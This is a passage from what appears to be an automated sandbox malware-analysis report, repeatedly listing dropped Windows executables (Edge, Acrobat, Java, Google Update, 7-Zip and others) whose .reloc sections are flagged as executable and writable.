                  Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVLP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OneDriveSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Integrator.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroTextExtractor.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADelRCP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADNotificationManager.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeCollabSync.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WCChromeNativeMessagingHost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRLogTransport.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRWindowsClientService.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Eula.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: LogTransport2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_acro.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_helper_acro.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 32BitMAPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 64BitMAPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MSRMSPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FullTrustNotifier.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ShowAppPickerForPDF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: appvcleaner.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: x.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: differences.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVLP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
